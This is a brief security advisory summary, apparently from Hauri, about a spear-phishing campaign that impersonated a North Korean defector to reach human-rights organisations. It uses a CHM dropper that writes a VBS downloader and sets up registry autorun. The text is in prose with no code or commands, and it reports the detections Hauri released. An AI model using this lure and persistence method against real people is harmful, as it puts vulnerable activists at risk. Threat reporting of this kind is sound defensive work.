Hauri warns that malicious emails impersonated a specific North Korean defector and targeted North Korean human-rights civic organizations. The lure used a ZIP attachment containing a Windows CHM help file about difficulties and activation measures for North Korean human-rights groups, making it likely that recipients would open it as reference material. When executed, the CHM runs hidden script logic that decodes an encoded malicious script string into mini.dat and mini.vbs, writes it to disk, and registers it for autorun through the registry. The C&C was already blocked at analysis time, and Hauri published detections for the phishing email, CHM dropper, and VBS downloader.